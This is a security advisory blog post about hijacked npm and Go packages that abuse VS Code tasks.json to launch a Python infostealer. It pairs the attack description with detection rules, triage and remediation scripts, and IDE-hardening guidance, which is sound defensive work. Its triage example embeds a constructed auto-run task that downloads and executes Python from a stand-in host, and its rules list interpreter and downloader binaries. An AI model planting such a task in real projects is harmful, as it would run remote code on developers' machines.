
Supply Chain Alert: Hijacked npm and Go Packages Using VS Code Tasks to Deploy Python Infostealers

Security Arsenal Team
June 29, 2026
6 min read

In June 2026, JFrog security researchers uncovered a supply chain attack against the open-source ecosystem. The campaign involves hijacked npm packages and a cluster of Go modules that deploy a Python-based information stealer on Windows, Linux, and macOS.

What sets this attack apart is its abuse of Visual Studio Code (VS Code) task configurations. By embedding malicious commands in .vscode/tasks.json, the actors sidestep the hardening introduced in npm v12, which restricts lifecycle scripts such as preinstall and postinstall. For defenders this is a shift in execution tradecraft: the vector is no longer the package manager binary but the developer's IDE. Organizations that consume open-source libraries should hunt for these artifacts now to prevent credential exfiltration and host compromise.

Technical Analysis

Affected Products & Platforms:

  • Platforms: Windows, Linux, macOS
  • Package Managers: npm (Node.js), Go (Golang)
  • IDE: Visual Studio Code (any version executing workspace tasks)

Attack Chain & TTPs:

  1. Initial Compromise: Threat actors hijack legitimate npm and Go packages or publish typosquatted look-alikes.
  2. Payload Injection: Instead of relying on package.json lifecycle scripts (which modern security tooling scrutinizes and npm v12 restricts), the attackers ship a .vscode/tasks.json file inside the package directory.
  3. Execution Trigger: When a developer or build server opens the compromised directory as a VS Code workspace, the IDE either prompts to run the task or runs it automatically if the task is marked to run on folder open and automatic tasks are allowed in a trusted workspace. VS Code only reads .vscode/tasks.json from the root of each opened workspace folder, so a copy nested under node_modules or the Go module cache fires only when that directory itself is opened; it remains a high-confidence indicator either way. The task definition points to a Python script.
  4. Payload Deployment: The Python script is a cross-platform infostealer that runs on Windows, Linux, and macOS and exfiltrates sensitive data (likely credentials, browser data, or cryptographic keys).
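
To make the trigger concrete, the following script triages a tasks.json for the indicators the chain above relies on: a task that runs on folder open, an interpreter or downloader as the command, hidden terminal output, and a file location inside a dependency directory. This is an added example, not code from the advisory or from JFrog; the SAMPLE_TASKS_JSON it parses is constructed for illustration and is not the artifact observed in the campaign.

```python
"""Triage a VS Code tasks.json for the tradecraft described in the attack chain above.

Added example, not code from the advisory or from JFrog. SAMPLE_TASKS_JSON is constructed
to illustrate the technique and is not the artifact observed in the campaign."""
import json
import re

# Constructed sample: one task that auto-runs on folder open and starts Python with an
# inline downloader, next to a benign npm build task. Task files are JSONC, so the
# comment on the second line is legal and must survive parsing.
SAMPLE_TASKS_JSON = r'''{
  // workspace tasks
  "version": "2.0.0",
  "tasks": [
    {
      "label": "postinstall-check",
      "type": "shell",
      "command": "python3",
      "args": ["-c", "import urllib.request as u; exec(u.urlopen('http://example.invalid/p.py').read())"],
      "runOptions": {"runOn": "folderOpen"},
      "presentation": {"reveal": "never", "echo": false}
    },
    {"label": "build", "type": "npm", "script": "build", "group": "build"}
  ]
}'''

# Interpreters and downloaders a library package has no reason to launch on folder open.
RISKY_BINARIES = {"python", "python3", "pythonw", "sh", "bash", "zsh", "cmd",
                  "powershell", "pwsh", "curl", "wget"}
DEPENDENCY_DIRS = ("/node_modules/", "/go/pkg/mod/")
FETCH_OR_DECODE = re.compile(r"https?://|urlopen|curl |wget |Invoke-WebRequest|iwr |base64", re.I)


def strip_jsonc(text: str) -> str:
    """Remove // and /* */ comments outside string literals. String literals are matched
    first in the alternation, so a '//' inside a URL is kept."""
    pattern = r'"(?:\\.|[^"\\])*"|//[^\n]*|/\*.*?\*/'
    return re.sub(pattern, lambda m: m.group(0) if m.group(0).startswith('"') else "", text, flags=re.S)


def task_command(task: dict) -> str:
    """Flatten command + args of a shell or process task into one string."""
    parts = [str(task.get("command", ""))] + [str(a) for a in task.get("args", [])]
    return " ".join(p for p in parts if p)


def triage_tasks_json(text: str, path: str = "") -> list:
    """Return one finding per task; a task is flagged when two or more indicators stack."""
    data = json.loads(strip_jsonc(text))
    posix_path = "/" + path.replace("\\", "/")
    in_dependency_dir = any(d in posix_path for d in DEPENDENCY_DIRS)
    findings = []
    for task in data.get("tasks", []):
        reasons = []
        if task.get("runOptions", {}).get("runOn") == "folderOpen":
            reasons.append("auto-runs on folder open")
        cmd = task_command(task)
        binary = cmd.split()[0].replace("\\", "/").rsplit("/", 1)[-1].lower() if cmd else ""
        if binary.endswith(".exe"):
            binary = binary[:-4]
        if binary in RISKY_BINARIES:
            reasons.append(f"launches {binary}")
        if FETCH_OR_DECODE.search(cmd):
            reasons.append("fetches or decodes a remote payload")
        if task.get("presentation", {}).get("reveal") == "never":
            reasons.append("hides its terminal output")
        if in_dependency_dir:
            reasons.append("tasks.json sits inside a dependency directory")
        findings.append({"label": task.get("label", "<unnamed>"),
                         "reasons": reasons, "suspicious": len(reasons) >= 2})
    return findings


if __name__ == "__main__":
    for f in triage_tasks_json(SAMPLE_TASKS_JSON, r"proj\node_modules\evil-pkg\.vscode\tasks.json"):
        print(("SUSPICIOUS " if f["suspicious"] else "ok         ") + f["label"], "; ".join(f["reasons"]))
```

Point it at every tasks.json the Velociraptor hunt below returns. The two-indicator threshold is deliberate: a tasks.json inside node_modules is odd on its own, but a benign build task placed there by a monorepo symlink should not page anyone, whereas an auto-running interpreter with hidden output should.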

Exploitation Status:

  • Confirmed Active Exploitation: Yes, observed in the wild by JFrog.
  • CVE: Not applicable (abuse of feature/configuration).

This technique leverages the trust developers place in their workspace configuration files. It allows the attacker to execute code under the context of the user running the IDE, often a developer with elevated privileges or access to critical source code and CI/CD secrets.

Detection & Response

The following detection rules focus on the anomalous use of VS Code to spawn interpreter processes (Python) from within dependency directories (node_modules or the Go module cache under go/pkg/mod), as well as the creation of the specific artifact involved. One caveat applies to all of them: shell-type tasks run inside the integrated terminal, so the direct parent of the interpreter is usually a shell, and VS Code is its grandparent.

Sigma Rules

YAML
---
title: Potential VS Code Task Execution from Dependency Directory
id: 8a2b4c1d-5e6f-4a3b-8c9d-1e2f3a4b5c6d
status: experimental
description: |
  Detects a Python interpreter whose command line or working directory points into
  node_modules or the Go module cache, started by VS Code or by a shell. Shell-type
  tasks run through the integrated terminal, so the direct parent of python.exe is
  usually cmd.exe or powershell.exe rather than Code.exe; both shapes are matched.
references:
  - https://thehackernews.com/2026/06/hijacked-npm-and-go-packages-use-vs.html
author: Security Arsenal
date: 2026/06/18
tags:
  - attack.execution
  - attack.t1204.002
  - attack.initial_access
  - attack.t1195.002
logsource:
  category: process_creation
  product: windows
detection:
  selection_parent:
    ParentImage|endswith:
      - '\Code.exe'
      - '\Code - Insiders.exe'
      - '\cmd.exe'
      - '\powershell.exe'
      - '\pwsh.exe'
  selection_child:
    Image|endswith:
      - '\python.exe'
      - '\python3.exe'
      - '\pythonw.exe'
  selection_path:
    - CommandLine|contains:
        - '\node_modules\'
        - '\go\pkg\mod\'
        - '\.vscode\'
    - CurrentDirectory|contains:
        - '\node_modules\'
        - '\go\pkg\mod\'
  condition: all of selection_*
falsepositives:
  - Developers deliberately running a script shipped inside a dependency from a terminal
level: high
---
title: Creation of .vscode/tasks.json in Dependency Directories
id: 9c3d5e2f-6a7b-4c5d-9e0f-2a3b4c5d6e7f
status: experimental
description: Detects a tasks.json being written to a .vscode folder anywhere below node_modules or the Go module cache (go\pkg\mod). Library packages have no legitimate reason to ship VS Code workspace tasks.
references:
  - https://thehackernews.com/2026/06/hijacked-npm-and-go-packages-use-vs.html
author: Security Arsenal
date: 2026/06/18
tags:
  - attack.initial_access
  - attack.t1195.002
logsource:
  category: file_event
  product: windows
detection:
  selection_file:
    TargetFilename|endswith: '\.vscode\tasks.json'
  selection_dir:
    TargetFilename|contains:
      - '\node_modules\'
      - '\go\pkg\mod\'
  condition: all of selection_*
falsepositives:
  - Monorepo tooling that symlinks workspace packages (which may carry their own .vscode folder) into node_modules
level: high

KQL (Microsoft Sentinel / Defender)

This query hunts for the process relationship indicative of the VS Code task execution vector, including the common case where a shell sits between VS Code and the interpreter. DeviceProcessEvents exposes the grandparent as InitiatingProcessParentFileName, which the Sigma rule above cannot express.

KQL — Microsoft Sentinel / Defender
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName in~ ('python.exe', 'python3.exe', 'pythonw.exe', 'python', 'python3')
// Shell-type tasks run inside the integrated terminal, so VS Code is normally the
// grandparent of the interpreter (Code.exe -> powershell.exe/cmd.exe/bash -> python).
| where InitiatingProcessFileName in~ ('Code.exe', 'Code - Insiders.exe', 'code')
    or InitiatingProcessParentFileName in~ ('Code.exe', 'Code - Insiders.exe', 'code')
// DeviceProcessEvents carries no working directory, so check both command lines.
| where ProcessCommandLine has_any ('node_modules', '.vscode', 'go/pkg/mod', @'go\pkg\mod')
    or InitiatingProcessCommandLine has_any ('node_modules', '.vscode', 'go/pkg/mod', @'go\pkg\mod')
| project Timestamp, DeviceName, AccountName, InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessCommandLine, ProcessCommandLine, FolderPath
| order by Timestamp desc
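
The parent-chain logic that the Sigma and KQL rules approximate, run over a handful of process events, as an added example that is not code from the advisory. The events are constructed, not captured telemetry; they model the shape described above, in which VS Code's pty host spawns PowerShell and PowerShell spawns Python, so a direct-parent-only rule misses the stealer.

```python
"""Parent-chain detection behind the Sigma and KQL rules above, run over sample events.

Added example, not the advisory's code. SAMPLE_EVENTS are constructed, not captured
telemetry. The point shown: a shell-type task runs inside the integrated terminal, so
VS Code is the interpreter's grandparent, and a direct-parent-only rule misses it."""
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str
    cwd: str


SAMPLE_EVENTS = [
    # VS Code window and its pty host (on Windows both show up as Code.exe)
    ProcEvent(100, 1, r"C:\Program Files\Microsoft VS Code\Code.exe", "Code.exe", r"C:\Users\dev"),
    ProcEvent(101, 100, r"C:\Program Files\Microsoft VS Code\Code.exe", "Code.exe --type=ptyHost", r"C:\Users\dev"),
    # shell task -> PowerShell -> python, cwd inside node_modules (the pattern to catch)
    ProcEvent(102, 101, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -Command python3 .vscode/setup.py", r"C:\Users\dev\proj\node_modules\evil-pkg"),
    ProcEvent(103, 102, r"C:\Python312\python.exe", "python3 .vscode/setup.py", r"C:\Users\dev\proj\node_modules\evil-pkg"),
    # benign: debugger launched directly by VS Code on the developer's own app
    ProcEvent(104, 100, r"C:\Python312\python.exe", r"python.exe C:\Users\dev\proj\app.py", r"C:\Users\dev\proj"),
    # benign: developer poking at a dependency from a plain cmd.exe, no VS Code in the chain
    ProcEvent(200, 1, r"C:\Windows\System32\cmd.exe", "cmd.exe", r"C:\Users\dev"),
    ProcEvent(201, 200, r"C:\Python312\python.exe", "python.exe", r"C:\Users\dev\proj\node_modules\left-pad"),
]

VSCODE_IMAGES = {"code.exe", "code - insiders.exe", "code"}
PYTHON_IMAGES = {"python.exe", "python3.exe", "pythonw.exe", "python", "python3"}
DEP_MARKERS = ("node_modules", "go\\pkg\\mod", "go/pkg/mod")


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def detect(events, max_depth: int = 3) -> list:
    """Flag Python processes tied to a dependency directory whose ancestry, up to
    max_depth hops, contains VS Code. max_depth=1 reproduces a direct-parent-only rule."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        if basename(e.image) not in PYTHON_IMAGES:
            continue
        haystack = (e.cmdline + " " + e.cwd).lower()
        if not any(marker in haystack for marker in DEP_MARKERS):
            continue
        ancestors, cur = [], by_pid.get(e.ppid)
        while cur is not None and len(ancestors) < max_depth:
            ancestors.append(basename(cur.image))
            cur = by_pid.get(cur.ppid)
        if any(name in VSCODE_IMAGES for name in ancestors):
            hits.append({"pid": e.pid, "ancestors": ancestors, "cwd": e.cwd})
    return hits


if __name__ == "__main__":
    print("grandparent-aware:", [h["pid"] for h in detect(SAMPLE_EVENTS)])               # [103]
    print("direct parent only:", [h["pid"] for h in detect(SAMPLE_EVENTS, max_depth=1)])  # []
```

With the full chain the stealer (pid 103) is the only hit: the debugger session (104) has no dependency path, and the cmd.exe session (201) has no VS Code ancestor. With max_depth=1 nothing fires, which is exactly why the Sigma rule above admits a shell as the direct parent and the KQL checks InitiatingProcessParentFileName.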

Velociraptor VQL

This VQL query hunts for .vscode/tasks.json files beneath common dependency directories on disk; standard library packages do not ship them. The matches are candidates for the file-level triage described in the attack chain, not proof of compromise on their own.

VQL — Velociraptor
-- Hunt for VS Code tasks.json shipped inside dependency folders.
-- Set the root for the platform, e.g. 'C:/Users' on Windows, '/home' on Linux, '/Users' on macOS.
-- Older Velociraptor releases name the path column FullPath instead of OSPath.
LET SearchRoot = '/home'

SELECT OSPath, Size, Mtime
FROM glob(globs=['**/node_modules/**/.vscode/tasks.json',
                 '**/go/pkg/mod/**/.vscode/tasks.json'],
          root=SearchRoot)
WHERE NOT OSPath =~ '\.vscode-server'   -- Exclude VS Code server install paths

Remediation Script (PowerShell)

This script scans a directory (recursively) for .vscode folders located within node_modules or the Go module cache and removes them. It is intended to be run in the root of a project suspected of infection. Capture a copy of the artifacts for incident response before removing them, and use -WhatIf first to review what would be deleted.

PowerShell
<#
.SYNOPSIS
    Removes suspicious .vscode directories from dependency folders.
.DESCRIPTION
    Scans for .vscode folders inside node_modules or the Go module cache (go\pkg\mod),
    which library packages have no reason to ship, and removes them so VS Code cannot
    run their tasks.json. Run from the root of the suspected project. Supports -WhatIf.
#>
[CmdletBinding(SupportsShouldProcess)]
param(
    [string]$Root = "."
)

Write-Host "[+] Scanning $Root for suspicious .vscode folders in dependency directories..."

# -Force makes Get-ChildItem descend into hidden directories as well.
$suspiciousPaths = Get-ChildItem -Path $Root -Recurse -Directory -Force -Filter ".vscode" -ErrorAction SilentlyContinue |
    Where-Object { $_.FullName -match "\\node_modules\\" -or $_.FullName -match "\\go\\pkg\\mod\\" }

if ($suspiciousPaths) {
    foreach ($path in $suspiciousPaths) {
        Write-Host "[!] Found suspicious artifact: $($path.FullName)" -ForegroundColor Yellow
        if ($PSCmdlet.ShouldProcess($path.FullName, "Remove directory")) {
            try {
                Remove-Item -Path $path.FullName -Recurse -Force
                Write-Host "[+] Removed: $($path.FullName)" -ForegroundColor Green
            } catch {
                Write-Host "[-] Failed to remove: $($path.FullName) - $_" -ForegroundColor Red
            }
        }
    }
} else {
    Write-Host "[+] No suspicious .vscode folders found in dependencies." -ForegroundColor Green
}

Write-Host "[+] Scan complete."

Remediation

  1. Audit and Sanitize Dependencies: Immediately audit package-lock.json and go.sum against the JFrog advisory (referenced via the Source URL). Remove any identified malicious packages.

  2. Remove Artifacts: Delete the node_modules folder and reinstall dependencies with npm ci (clean install); for Go, clear the module cache with go clean -modcache and rebuild it with go mod tidy. Do this only after verifying the integrity of package.json and go.mod. Ensure no .vscode folders remain inside dependency directories.

  3. IDE Hardening: Stop VS Code from running tasks when a folder is opened. Set "task.allowAutomaticTasks": "off" in user settings, keep Workspace Trust enabled ("security.workspace.trust.enabled": true) with "security.workspace.trust.startupPrompt": "always", and do not grant trust to a freshly cloned or extracted package before reviewing its .vscode folder. Tasks do not run in untrusted workspaces, so trust is the outer gate and the automatic-tasks setting the inner one.

  4. Supply Chain Vetting: Implement Software Composition Analysis (SCA) tools that detect not only known CVEs but suspicious file inclusions (such as .vscode directories or loose scripts) inside package artifacts.

  5. Credential Rotation: Because an infostealer was deployed, assume that any developer credentials (API keys, tokens, SSH keys) present on the host during the infection are compromised. Rotate them immediately.
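
The IDE hardening in step 3 is easy to state and easy to drift from, so here is an added example (not code from the advisory) that audits a VS Code user settings.json against that posture and emits a hardened copy with every other setting preserved. WEAK_SETTINGS is a constructed sample; the keys are real VS Code settings, and the values required for them are this example's recommendation.

```python
"""Audit a VS Code user settings.json against the IDE hardening in step 3 and emit a
hardened copy.

Added example, not the advisory's code. WEAK_SETTINGS is a constructed sample; the keys
are real VS Code settings, the chosen values are this example's recommendation."""
import json
import re

WEAK_SETTINGS = r'''{
  // user settings, as left by a developer who switched the trust prompts off
  "editor.fontSize": 14,
  "task.allowAutomaticTasks": "on",
  "security.workspace.trust.enabled": false,
  "security.workspace.trust.startupPrompt": "never"
}'''

# Required posture. Missing keys are flagged too, so the policy is explicit rather than
# relying on whatever the current VS Code default happens to be.
REQUIRED = {
    "task.allowAutomaticTasks": "off",                    # no runOn=folderOpen tasks without a click
    "security.workspace.trust.enabled": True,             # untrusted workspaces cannot run tasks at all
    "security.workspace.trust.startupPrompt": "always",   # ask every time an unknown folder opens
    "security.workspace.trust.untrustedFiles": "prompt",  # no silent trust for loose files
}


def strip_jsonc(text: str) -> str:
    """Remove // and /* */ comments outside string literals (settings.json is JSONC)."""
    pattern = r'"(?:\\.|[^"\\])*"|//[^\n]*|/\*.*?\*/'
    return re.sub(pattern, lambda m: m.group(0) if m.group(0).startswith('"') else "", text, flags=re.S)


def audit_settings(text: str) -> list:
    """Return one line per setting that deviates from REQUIRED (empty list means compliant)."""
    settings = json.loads(strip_jsonc(text))
    return [f"{key}: {settings.get(key, '<unset>')!r} (expected {wanted!r})"
            for key, wanted in REQUIRED.items() if settings.get(key) != wanted]


def harden(text: str) -> str:
    """Return settings.json text with REQUIRED applied and all other settings preserved."""
    settings = json.loads(strip_jsonc(text))
    settings.update(REQUIRED)
    return json.dumps(settings, indent=2)


if __name__ == "__main__":
    for finding in audit_settings(WEAK_SETTINGS):
        print("[!]", finding)
    print(harden(WEAK_SETTINGS))
```

Run it against the user settings file on developer and build hosts (the path differs per platform, so pass the file contents in). Note that harden() drops comments from the file, since it round-trips through json; if you manage settings.json by hand, apply the four keys from REQUIRED instead of overwriting the file.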
